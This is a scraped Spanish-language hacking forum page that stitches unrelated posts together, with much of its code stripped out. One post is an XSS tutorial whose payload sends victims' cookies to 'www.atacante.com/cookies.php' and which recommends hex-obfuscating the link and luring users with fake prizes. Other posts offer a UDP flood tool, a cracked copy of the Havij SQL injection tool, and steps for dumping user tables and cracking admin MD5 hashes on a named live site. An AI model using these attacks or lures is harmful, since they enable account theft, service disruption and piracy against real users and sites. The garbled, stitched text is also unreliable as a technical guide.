Todas las páginas Web están escritas con un sencillo lenguaje de programación, el lenguaje HTML y son un archivo de tipo .html o .htm. Estos archivos se pueden enlazar para saltar de uno a otro con los enlaces o links. Después de visulizar con un navegador como Microsoft Internet Explorer o Netscape Navigator.
Por comodidad utilizamos diferentes programas para crear páginas web de forma visual, como FrontPage Express, FrontPage o DreamWeaver.
Vamos a crear una sencilla página web directamente en HTML, utilizando cualquier editor de texto que no introduzca ningún código especial de formato, como por ejemplo el Bloc de Notas de Windows.
Antes de comenzar a crear las páginas debes pensar en la organización de los archivos, recuerda que las imágenes, sonidos, etc., son archivos independientes. Es una buena idea crear una estructura de directorios para organizarlos.
Lenguaje HTML
Se caracteriza por el uso de etiquetas, una de inicio y otra de fin, de forma que lo que aparece en medio se ve afectado por el significado de la etiqueta. La etiqueta suele ser una palabra en inglés, entre < > cuando aparece y entre al final.
Por ejemplo:
Mi primera Página Web chispas
centra en la pantalla el texto entre las etiquetas.
Algunas etiquetas no tienen etiqueta final, como la de insertar una línea,
, o salto de línea
, párrafo
, etc.
Estructura de una página Web
Todas las páginas Web tienen la siguiente estructura:
Insertar texto
Si escribimos un texto, se mostrará con las características por defecto del navegador.
Para modificar alguna de las propiedades debemos usar etiquetas específicas:
: tamaño máximo del navegador. El 2, 3, 4 y 5 los siguientes tamaños.
: salto de párrafo.
: salto de línea.
: dibuja en la pantalla una línea de un extremo al otro.
: justifica el texto.
Etc....
Insertar imágenes
La etiqueta para insertar una imagen es , el resto son parámetros:
Insertar enlaces
Un enlace nos permite “saltar” de una página a otra, ya sea dentro de nuestro sitio web o a una página remota. La etiqueta es:
aqui les traigo este escaner supercompletico espero que les sea de provecho dentro del ra esta el serial y comenten mis post aver si me gano algun rango
XSS Inyection (TUTORIAL)Hola Imperzone,Bueno pues voy ha hacer una pequeña introducción a los ataques XSS, el caso que voy a poner es el de una web que utilize cookies y tenga un buscador(el típico buscador que tiene una caja de texto y un botón).
decir que para una facil compresión de este mini-tutorial es mejor tener unos conocimientos básicos sobre html.
[~]Lo primero es hacer una pequeña introduccion sobre que es una cookie:
Citar
- Una cookie es un almacen de informacion que se guarda en el ordenador del usuario y en cualkier momento la pagina puede pedir la informacion, que contiene la cookie, al ordenador del usuario...
* Ahora que sabemos que es una cookie lo que vamos ha hacer es ver el nombre de la página donde se encuentra el buscador, en nuestro caso es buscador.php(xDD)
* Después vamos a ver si el buscador es vulnerable. Para ello podemos poner en el buscador, por ejemplo:
Codigo:
alert()
[~]Si salta una alarma al pulsar el boton, significa que ese buscador es vulnerable.
[~]Si no salta pues no jodemos y a buscar otro...
* Suponiendo que sea vulnerable, el siguiente paso es ver el nombre de la caja de texto y del botón.
Para esto, tenemos que ver el codigo fuente de dicha página y buscar algo como:
que será el textbox(caja de texto xD).
que será el boton.
* Ahora ya sabemos que el textbox se llama palabra y que el botón se llama buscar.
[~]Para almacenar las cookies, tenermos dos opciones -> almazenarlas en una base de datos(mysql) o almacenarlas en un archivo de texto(la mas facil).
* A continuacion vamos a crear una pagina en php, este archivo creará otro (archivo.txt) cuando algun usuario caiga en el ataque y escribira a continuacion los siguientes usuarios.
cookies.php
Código:
archivo.txt
Este archivo se creara automaticamente y será en el que se almacenen las cookies, osease, que para ver los resultados teneis que entrar en este archivo.
* Una vez hecho este paso solo tenemos que crear "LA URL MALIGNA"(como yo lo llamo) que será de la siguiente forma:
* Voy a explicar cada parte de esta "URL MALIGNA".
[~]
[~]?palabra=
Esta parte es para darle un valor a la variable palabra, es decir, si el textbox se llamara manolo esto quedaría de la siguiente forma: ?manolo=
Lo mas importante:
[~]window.location='http://www.atacante.com/cookies.php?...okie;
Esto es el valor que le damos a la variable palabra (que es el textbox). Este valor lo que hace esque redirecciona a la pagina http://www.atacante.com/cookie.php y le da el valor de la cookie(del usuario de la web) a la variables cookie de la pagina que creamos antes(cookies.php)
Suena un poco lioso pero es muy simple.
[~]&buscar=;
Esto lo que hace es simular que el boton (con el nombre -> buscar) este pulsado, sin esto no realizaria la acción.
Tambien decir que si el botón del buscador se llamara jose, eso tendriamos que reemplazarlo por &jose=;
* Ahora viene la parte mas importante, que es hacer que un usuario de esa web(que esté registrado) entre en ese enlace("LA URL MALIGNA").
Esto seguramente sea la parte mas complicada, porque cualkier persona con unos conocimientos muy basicos de programacion web sabría lo que hace esa "URL MALIGNA". Con lo cual vamos a proceder a "camuflar" un poco esa URL.
Para esto vamos a sustituir cada caracter por su correspondiente valor en hexagesimal poniendo el signo % delante de cada uno.
y tendrias que continuar cambiando los caracteres a hexagesimal.
Como conseguir que un usuario de esa web entre en esa URL, jejeje, pues ¡¡¡puedes decirle que le toca un premio si entra!!!(xDD) o puedes entrar al foro de esa web(si lo tuviera) y poner la direccion con alguna buena escusa como: "Que le pasa a la web, cuando entro en esta URL me sale una tía en bolas";
Otra opción es ponerlo como una noticia (si tienes un sistemas de noticias) o como se te ocurra.
=============================================
Solo me queda decir que no solo son vulnerbles a un ataque XSS los buscadores, puede ser cualquier formulario que os encontreis por internet, desde un registro de usuario hasta un foro(lo digo por experiencia).
=============================================
CONCLUSION: Este ataque se basa en redireccionar a un usuario(sea como sea) hacia una pagina, tuya, en la que guardes su cookie.
Bueno este tuto se basa en hackear una web mediante XSS Injection pero no solo unna web normal si no que tambien se pueden hackear Holos antiguos mediante esta injection bueno yo lo que are sera dejarle tambien un videotutorial creado By Pivot en ese tuto lo malo es que los Codigos no se ven bien pero por un lado en este mismo tutorial (arriba) estan los codigos por orden al = que en el video
Bueno espero que aprendan los que no saben bla Bla Bla ect... xp
Bueno... como ven e puesto fuente y toda esas cosas.
Saludos
udp floodudp flood v1.0 v1.0[b]hola amigo soy nuevo aka le dejo una tool de udp flood v1.0 que sirve para atacar a website y mu online ok gracias[/b]
Capturar Cookies [ PHP, XSS ]Que hay peña?, bueno algunos me verán por Xat, empezare diciéndoles que me la pela que sea Newbie / Lammer en este Foro, no tenéis ni puta idea de lo que llevo en este mundo. La mitad de todos vosotros sois jilipollas y os creéis Hackers cuando no sabéis lo que significa. Bueno me desvío del tema porque sinceramente os diría un par de cosillas que os callarían la boca.
- Seguramente no habrás leído el párrafo de arriba porque vas al grano, pues bien, voy a mostraros una manera de codear un Tip en PHP, en el cual obtengamos los Cookies de la víctima, sacando jugo y estrujándonos la cabeza podamos hacer que llegue una luz nuestra única neurona para que podamos ownear un puto Xat de mierda.
- 1º ; Paso de escribir la biblia, os jodeis así que debéis tener un Host, en el que podáis subir el Archivo Php.
- Si no lo entendéis os jodeis y os las apañáis, si os sale, me la pela. Esto solo es para que os hagáis una idea de cómo podríais hacerlo.
Empezaríamos haciendo una inyección a la Web de la que queremos sacar las Cookies, quedaría algo así.
Código:
Cdigo
- Recordar también que debéis crear un archivo .php que capture las cookies, ponéis esto en un bloc de notas.
Bien, cuando ya tengais el archivo en su lugar correspondiente, y veais que tiene buena pinta, para sacar cookies, enviais el link dónde se encuentra este archivo, es decir, copiais la URL y se la mandais a la persona que querais sacar Cookies, si ajustaramos los parametros podriamos obtener el usuario y contraseña de la Web, bueno esto es todo sucios escrotos.
Te pedira una Pass ( Clave) Que es: Exidous
(no ase falta instalarlo solo descarga)
Descargar Havij Registro FULLAquí os dejo el programa de Inyección SQL Avanzada llamado Havij (Pro) en su última versión 1.5, con el registro 'Crackeado' para que lo disfruteis a lo grande xD
• Vista previa •
Ampliar esta imagen.
Para registrarlo y dejarlo 'Full', le das a "Register", si no encuentras donde pone "Register" te dejo la imágen señalándote donde está:
• ¿Dónde está "Register"? •
Ampliar esta imagen.
Y rellenas los dos espacios de texto, con estos datos tal cual los voy a poner:
/
%
MIRENLA ES UNA PEQEÑA OWNEADA PERO ESTA BIEN ! &
"
$
--------------------------------------------------------------------------- -----------------------------------------
QUEREIS APRENDER A DAROS OWNER EN UN XAT AORA OS ARE UNA PEQEÑA EXPLICACION:
1º.Descargamos el havij: http://www.mediafire.com/?1kpgau8eu23h3bp
2º.Entramos A Ciudadhabbo Para El Siguiente Paso
3º. Una Vez Abierto Ciudadhabbo Buscar Un Holo Vulnerable Por Ej: starterhotel.sytes.net/?error=ban&user=1
4º. Si No Sale Que Estamos Baneados No Es Vulnerable
5º. En Target Copiar El Link Del Holo Vulnerable Por Ej: starterhotel.sytes.net/?error=ban&user=1
6º. Hacemos Click En Analyze Y Esperamos
7º. Abajo Nos Sale Un Cuadro Con Muchas Palabras
8º. Cuando Ya Nos Salga Lo Que Puse Abajo Estara Finalizado
Selected Column Count is 8
Injection type is String (')
Valid String Column is 4
Current DB: Alejo
9º.Ahora Hacemos Click A Tables, Nos Saldra Un Nuevo Menu Luego Le Daremos A Get Tables
10º.Nos Saldran Muchos Datos, Le Damos Click A Users y le damos a get Columns
11º. Nos saldran mas cuadros clikamos en rank, password, y user.
12º. Ahora esto es lo mas importante donde dice Get Data sale una flechita hacia abajo, le damos
13º.Ahora le damos donde dice filter y nos pide para escribir, nosotros escribiremos esto: "rank=7" O El Rank Que Quieran
14º.Le damos a ok, y luego a donde dice get data
15º.Las claves nos saldran cifradas pero no pasa nada, le damos doble click en la clave cifrada y pulsamos Control + C
16º.Le damos al boton de la llavecita que dice MD5
17º.Donde dice MD5 Hash Borramos El Code Que Sale Y Ponemos La Clave Cifrada Del Admin Que Quieran
18º.Luego De Hacer Eso Les Saldra El Code Y Entran A El Hotel Con El User Del Que Le Sacaron Pass
VT: http://www.virustotal.com/url-scan/[....]6f2fbe8df278aa6c185b6036-1319394015
en este Post Utilizaremos el Host , 000webhost y porsupuesto la pagina que no registrata
el Dominio que seria nic.ar .
Aclaratoria: esto es Legal aunque no lo paresca.
Video :
Bueno espero que les halla servido , el Dominio durara entre 12 a 24 Horas en activarce.
Saludos a todos
Crear Un Vinculo WebHoloa Amigos... Soy su amigo Zeus Hoy mostrandoles y enseñandoles a hacer un vinculo web en codigo HTML.Bueno El Primer Paso Es:1º: Ponen El siguiente Codigo HtmlSpoiler: 2º: Copialo y pegalo en tu sitio web y ya Tenes el vinculo Ejemplos: TEXTOSaludos...
Bueno primera mente abrimos photoshop cs4 y le damos a nuevo en este caso usare 750,250 despues ya tienen su cuadro de banner despues le dan a el barquito de pintura y lo pintan de el olor que quiera en este caso yo lo pondre negro,y le pondre solo letras
Asi estara ok, pues yo le dare a las letras y escribire lo que quiera en mi caso Narutox Yeah Fuck Despues lo guardamos y lo guardamos png . Bueno eso fue el post espero que les guste,Y Tambn despues le subire video mas detallado bye..
Comentar no cuesta nada pero postear cuesta escribir
Agregar un comentario